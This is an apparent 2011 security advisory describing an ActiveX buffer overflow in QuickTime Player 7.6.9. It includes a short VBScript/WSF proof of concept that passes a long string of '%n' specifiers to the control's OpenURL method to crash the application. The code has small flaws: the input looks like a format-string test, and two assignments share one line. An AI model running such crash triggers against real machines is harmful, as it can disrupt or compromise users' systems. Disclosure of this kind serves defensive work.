Quick Time Player 7.6.9 – ActiveX Control Buffer Overflow Vulnerability

Author(s): Ivan Sanchez & Hernan Hegykozi
Contact Us: security@evilcode.com.ar
Versions: QuickTimePlayer_7.6.9
Date: 06/09/2011
Product:QuickTimePlayer_7.6.9
Vendor Notified: 2 months ago  “Apple Inc  / bugreport.apple.com ”
Problem ID: 9753778

We have discovered that the product “QuickTimePlayer_7.6.9″ presents a big hole regarding an ActiveX Control Buffer Overflow, crashing the application when you run special code.

Vulnerability Details:

This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of QuickTimePlayer.dll. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the QuickTimePlayer.dll component explicitly trusting a length embedded within a particular file in order to calculate the length of a buffer. The application will then duplicate an arbitrarily sized string into a statically sized buffer located on the stack. This can lead to code execution under the context of the application.


POC:

1-Open the Quicktime ,

2-Run the following code:

crashapp.wsf

<?XML version='1.0' standalone='yes' ?>
<package><job id='DoneInVBS' debug='false' error='true'>
<object classid='clsid:0F5B08E7-94EE-470B-A184-5CD4A7DF35A3' id='target' />
<script language='vbscript'>
targetFile = "C:\Program Files\QuickTime\QuickTimePlayer.dll"
prototype  = "Sub OpenURL ( ByVal url As String )"
memberName = "OpenURL"progid     = "QuickTimePlayerLib.QuickTimePlayer"
argCount   = 1
arg1="%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n"
target.OpenURL arg1
</script>
</job>
</package>

3-The APP will crash.




Leave a Reply